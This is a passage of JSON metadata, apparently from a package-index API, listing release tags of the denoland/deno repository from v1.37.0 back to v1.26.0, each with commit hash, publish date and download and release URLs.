ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/m